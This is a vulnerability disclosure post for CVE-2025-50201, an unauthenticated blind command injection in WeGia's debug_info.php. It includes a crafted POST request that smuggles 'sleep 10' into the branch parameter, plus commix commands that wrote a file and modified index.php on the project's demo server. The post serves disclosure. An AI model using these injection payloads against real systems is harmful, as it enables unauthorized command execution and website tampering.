Featured image of post CVE-2025-50201
Command Injection Critical WeGia Security WebApp

CVE-2025-50201

Command Injection

CVE-2025-50201: OS Command Injection (Blind Time-Based) in debug_info.php parameter branch

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-50201

Summary

An OS Command Injection vulnerability was identified in the /html/configuracao/debug_info.php endpoint. The branch parameter is not properly sanitized before being concatenated and executed in a shell command on the server's operating system.

This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user (www-data). This completely compromises the Confidentiality, Integrity, and Availability of the application and the underlying server.

Details

The vulnerability can be triggered by sending a POST request to the vulnerable endpoint and injecting shell metacharacters (such as ;) into the branch parameter. The server executes the supplied input without validation. The vulnerability was confirmed to be "Blind," as the command's output is not directly reflected in the HTTP response, thus requiring time-based exploitation techniques.

Initial Vulnerable Request:

1
2
3
4
5
6

POST /html/configuracao/debug_info.php HTTP/1.1
Host: demo.wegia.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

branch=master; sleep 10&action=switch

The server's delayed response confirmed the vulnerability.

PoC

To demonstrate a tangible impact on system integrity, the commix tool was used to inject an echo command that creates a new HTML file in a web-accessible directory on the server.

1. Attack Command:

The following command was executed to create the prova_tcc.html file on the server with custom content:

python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" \--data="branch=master&action=switch" -p "branch" -technique="time" \--os-cmd='echo "<h1>Server Hacked - Server Access Confirmed</h1>" > prova_tcc.html'

python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" --data="branch=master&action=switch" -p "branch" --technique="time" --time-sec=2 --os-cmd='echo "teste" >> ../../index.php'

2. Verification:

After the command execution, the created file became publicly accessible via the browser at the following URL: https://demo.wegia.org/html/configuracao/prova_tcc.html

After the command execution, the page https://demo.wegia.org/ has been modified like the imagem bellow:

Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to:

  • Compromise Confidentiality: Read sensitive files from the server, including the application's source code, API keys, and configuration files.
  • Compromise Integrity: Modify or delete any file to which the www-data user has write permissions, allowing for website defacement, malware injection, or application destruction.
  • Compromise Availability: Execute commands that consume system resources (CPU, Memory), leading to a Denial of Service (DoS).
  • Act as a Pivot: Use the compromised server as a base to attack other systems on the internal network.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf

Reporter

Pedro Lyrio

Contributor

Diego Castro

By: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy